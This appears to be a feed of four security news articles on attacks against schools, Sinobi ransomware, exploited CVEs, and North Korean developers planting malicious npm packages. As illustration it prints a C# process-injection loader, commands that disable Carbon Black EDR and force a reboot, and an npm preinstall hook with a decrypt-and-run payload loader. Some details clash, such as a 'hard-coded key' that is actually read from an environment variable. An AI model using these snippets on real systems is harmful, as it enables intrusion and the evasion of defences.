As students and staff returned to campuses this August, a stark rise in cyber attacks against educational institutions has been observed worldwide.

From January to July 2025, organizations in the education sector endured an average of 4,356 weekly attacks, marking a 41 percent year-over-year increase. These assaults range from credential-harvesting phishing domains to sophisticated delivery of malicious code aimed at compromising networks and exfiltrating sensitive data.

The emergence of themed phishing campaigns timed to the back-to-school rush has amplified both volume and sophistication of these threats, exploiting end-user urgency and reliance on digital platforms.

Attacks have struck uniformly across all regions, but Asia-Pacific organizations faced the heaviest onslaught, with 7,869 average weekly attacks per organization.

North America saw the steepest spike, rising 67 percent YoY, while Europe and Africa recorded increases of 48 percent and 56 percent respectively.

At the country level, Italy led with 8,593 attacks per organization, followed by Hong Kong at 5,399, Portugal at 5,488, and the United States at 2,912.

Check Point analysts noted that the scale and timing of these surges indicate attackers are leveraging the seasonal spike in digital activity to maximize impact and evade detection.

Beyond sheer volume, attackers have refined their techniques. In July alone, over 18,000 new domains mimicking academic institutions were registered, with one in every 57 flagged as malicious or suspicious.

These domains often host impersonation pages that mimic Microsoft’s login interfaces. Check Point researchers identified multiple campaigns where malware payloads were delivered via seemingly benign SVG attachments or QR-encoded PDF forms, enabling credential theft and the deployment of secondary loaders.

Infection Mechanism

A deeper look at the malware’s infection chain reveals a multi-stage process designed for persistence and evasion.

Initial compromise begins with a phishing email containing either a crafted SVG file or a PDF disguised as a university communication.

When opened, the SVG invokes an embedded JavaScript that fetches a payload from a typo-squatted domain.

// Simplified loader injection snippet
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

class Injector {
    [DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int a, bool b, int c);
    [DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr h, IntPtr addr, byte[] data, int size, out IntPtr written);
    [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr h, IntPtr lp, uint sz, IntPtr start, IntPtr arg, uint flags, out IntPtr id);

    static void Main(string[] args) {
        Process target = Process.Start("svchost.exe");
        IntPtr h = OpenProcess(0x1F0FFF, false, target.Id);
        byte[] shellcode = Convert.FromBase64String("..."); // encrypted payload
        WriteProcessMemory(h, target.MainModule.BaseAddress, shellcode, shellcode.Length, out _);
        CreateRemoteThread(h, IntPtr.Zero, 0, target.MainModule.BaseAddress, IntPtr.Zero, 0, out _);
    }
}

The payload is a .NET executable that decrypts in memory and drops a lightweight malware loader into the Windows Startup folder for persistence.

Detection evasion is achieved using process hollowing: the loader spawns a legitimate process (e.g., svchost[.]exe), unmaps its memory, and injects malicious code into the hollowed instance.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Cyber Attacks Targeting Education Sector Surges Following Back-to-School Season appeared first on Cyber Security News.

A sophisticated ransomware attack has emerged targeting organizations through compromised third-party managed service provider (MSP) credentials, showcasing the evolving tactics of cybercriminals in 2025.

The Sinobi Group, operating as a Ransomware-as-a-Service (RaaS) affiliate, successfully infiltrated corporate networks by exploiting SonicWall SSL VPN credentials mapped to over-privileged Active Directory accounts with domain administrator rights.

The attack campaign demonstrates a concerning trend where threat actors leverage trusted third-party relationships to gain initial network access, bypassing traditional perimeter defenses.

Once inside the network, the attackers established persistence by creating new administrator accounts and executing lateral movement across the compromised infrastructure, ultimately deploying the Sinobi ransomware payload across local and shared network drives.

eSentire analysts identified significant code overlaps between Sinobi and the previously known Lynx ransomware, suggesting that Sinobi represents a rebrand of the Lynx RaaS operation that first emerged in 2024.

The security researchers noted with medium confidence that the Lynx group likely purchased the INC Ransomware source code from a user named “salfetka” through underground hacking forums, indicating the commercialization of ransomware development tools.

The malware’s technical sophistication becomes apparent through its systematic approach to disabling security controls and maximizing encryption impact.

Upon gaining access, the threat actors attempted to uninstall Carbon Black EDR using both Revo Uninstaller and command-line operations, eventually succeeding after discovering deregistration codes stored on mapped network drives.

Advanced Encryption and Data Exfiltration Mechanisms

The Sinobi ransomware employs a robust cryptographic implementation using Curve-25519 Donna combined with AES-128-CTR encryption, making file recovery impossible without the attacker’s private key.

The malware generates unique encryption keys for each file through the CryptGenRandom function, ensuring cryptographically secure key generation that eliminates potential decryption opportunities.

Prior to encryption, the ransomware systematically prepares the target environment by deleting volume shadow copies through a sophisticated technique utilizing DeviceIOControl with the IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE control code.

The malware executes the following command sequence:-

sc config cbdefense start= disabled
cmd /c sc config cbdefense binpath= "C:\programdata\bin.exe" & shutdown /r /t 0

Data exfiltration occurs through RClone, a legitimate cloud transfer utility, directing stolen information to servers operated by Global Connectivity Solutions LLP, a hosting provider frequently observed in cyberattacks.

The ransomware creates encrypted files with the .SINOBI extension and deploys README.txt ransom notes containing Tor-based communication channels and payment instructions, demanding victims negotiate within seven days to prevent data publication on dark web leak sites.

The attack underscores the critical importance of implementing strict privilege management for remote access accounts and avoiding storage of security tool deregistration codes in accessible network locations.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Leverage Compromised Third-Party SonicWall SSL VPN Credentials to Deploy Sinobi Ransomware appeared first on Cyber Security News.

Cybersecurity teams worldwide have observed a surge in sophisticated campaigns exploiting both Windows and Linux vulnerabilities in recent months to achieve unauthorized system access.

These attacks often begin with phishing emails or malicious web content designed to deliver weaponized documents. Once opened, the embedded exploits target unpatched vulnerabilities in commonly used software components, allowing attackers to execute arbitrary code on victim machines.

As organizations struggle to keep pace with patch management, threat actors have intensified their focus on high-impact flaws that remain unaddressed in many environments.

Securelist researchers identified that several long-standing vulnerabilities in Microsoft Office’s Equation Editor continue to be a favorite initial access vector.

CVE-2018-0802 and CVE-2017-11882, both remote code execution flaws in the Equation Editor component, remain heavily exploited despite patches being available for years.

In addition, CVE-2017-0199, a flaw affecting Office and WordPad, provides another path for payload delivery.

These Office exploits are often combined with more recent Windows File Explorer and driver vulnerabilities—such as CVE-2025-24071, which enables NetNTLM credential theft via .library-ms files, and CVE-2024-35250, a ks.sys driver code execution issue—to establish a foothold and escalate privileges.

Beyond Microsoft Office, attackers have also leveraged WinRAR’s archive-handling weaknesses. CVE-2023-38831 and the directory traversal flaw CVE-2025-6218 allow adversaries to place malicious files outside the intended extraction path, hijacking system configurations or dropping persistence backdoors.

On the Linux side, the Dirty Pipe vulnerability (CVE-2022-0847) remains a critical favorite for privilege escalation, while CVE-2019-13272 and CVE-2021-22555 continue to be used to gain root access on unpatched servers.

Infection Mechanism

A particularly insidious infection mechanism combines Office-based delivery with secondary exploitation of system drivers. Securelist analysts noted that attackers craft RTF documents containing shellcode that invokes Equation Editor through OLE objects.

Once the vulnerability triggers, shellcode downloads a two-stage payload: a small loader and a full-featured malware binary.

The loader leverages CVE-2025-24071 to harvest NetNTLM hashes from incoming SMB connections, forwarding them to a C2 server.

The full payload then exploits CVE-2024-35250 to load a malicious driver into kernel space, granting attackers unrestricted code execution.

This dual-exploit chain allows adversaries to bypass user-level defenses and deploy rootkits undetected.

In many incidents, once kernel-level control is achieved, attackers install custom C2 frameworks—such as Sliver or Havoc—to maintain persistence.

These implants include in-memory protection to evade antivirus scans and use legitimate Windows services to blend into normal processes.

By chaining publicly known exploits, actors can rapidly move from initial compromise to full system control without writing suspicious files to disk.

Vulnerability Details:-

This consolidated view highlights the persistence of older vulnerabilities alongside newer flaws, underscoring the critical need for timely patching and comprehensive defense-in-depth strategies.

Organizations should prioritize updates for both user applications and system components to mitigate the risk of these prevalent exploits in real-world attacks.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Threat Actors Leveraging Windows and Linux Vulnerabilities in Real-world Attacks to Gain System Access appeared first on Cyber Security News.

Over the past year, security researchers have observed a growing trend of North Korean–linked developers establishing credible-looking profiles on popular code-sharing platforms such as GitHub, CodeSandbox, and Gist.

These accounts frequently host legitimate open-source projects alongside hidden payloads, allowing operators to mask malicious activity under the guise of normal developer contributions.

The overall goal appears to be multifaceted: generating revenue for state-sponsored programs, obtaining access to remote work contracts, and using those engagements as beachheads for more sophisticated cyber operations.

Initially, these profiles attracted attention due to unusually high activity levels and the adoption of advanced software stacks—including React.js front ends, Node.js back ends, and Dockerized deployment configurations—designed to impress prospective clients.

However, a deeper analysis revealed carefully obfuscated modules within certain repositories that leveraged compromised dependencies to deliver remote access trojans.

THE RAVEN FILE analysts noted that these repositories often employed minimalistic README files to distract from hidden directories named .secret or .vendor where malicious payloads were staged.

The impact of these operations has been significant. Several victims unknowingly installed tainted packages during routine dependency updates, granting attackers persistent access to corporate networks or cloud environments.

In one documented case, a financial services firm imported a library called @jupyter-utils/rpc that contained a loader script intercepting WebSocket connections and exfiltrating credentials via an embedded C2 channel.

The combination of legitimate functionality and covert communication made detection extremely difficult for standard signature-based scanners.

Infection Mechanism and Persistence Tactics

A closer look at the infection mechanism reveals a multi-stage loader that activates only when certain environmental conditions are met.

Upon installation, the malicious package executes a preinstall script defined in package.json:-

"scripts": {
  "preinstall": "node scripts/setup.js"
}

The setup.js module then checks for the presence of common CI/CD directories (.gitlab-ci, .github/workflows) before deploying an encrypted payload into the application’s runtime directory.

This payload, stored as payload.enc, is decrypted in memory using a hard-coded key and immediately executed via Node’s vm module:-

const vm = require('vm');
const fs = require('fs');
const key = Buffer.from(process.env.DEPLOY_KEY, 'hex');
const cipher = fs.readFileSync('./payload.enc');
const decrypted = decrypt(cipher, key);
vm.runInThisContext(decrypted);

This below figure illustrates how the primary repository README masks the scripts folder, while Figure 2 (“deepfake_result.png”) shows the deepfake profile image used to enhance credibility.

By embedding itself at the package manager level and leveraging CI/CD hooks, the malware achieves both stealthy installation and persistence.

Removal requires thorough dependency audits and validation of all installation scripts.

As organizations increasingly rely on open-source components, understanding these infection vectors is critical to safeguarding supply chains and maintaining trust in collaborative development platforms.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post DPRK IT Workers Using Code-Sharing Platforms to Secure New Remote Jobs appeared first on Cyber Security News.